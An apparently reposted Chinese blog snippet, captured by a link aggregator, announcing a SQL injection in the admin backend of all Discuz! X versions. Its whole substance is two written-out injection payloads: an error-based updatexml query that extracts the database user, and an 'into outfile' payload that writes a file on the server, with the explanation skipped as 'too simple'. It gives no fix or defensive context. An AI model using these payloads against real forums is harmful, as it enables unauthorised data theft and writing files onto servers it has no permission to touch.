8

DiscuzX全版本后台sql注入

 2 years ago
source link: https://zh1x1an.github.io/2020/01/07/DiscuzX%E5%85%A8%E7%89%88%E6%9C%AC%E5%90%8E%E5%8F%B0sql%E6%B3%A8%E5%85%A5/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

DiscuzX全版本后台sql注入

创建时间:2020-01-07 17:43
字数:35 阅读:16 评论:0 
1' and (updatexml(1,concat(0x7e,(select user()),0x7e),1)); -- -
1' into outfile '1.txt'; -- -

漏洞思路过于简单,略

转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论

0


report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK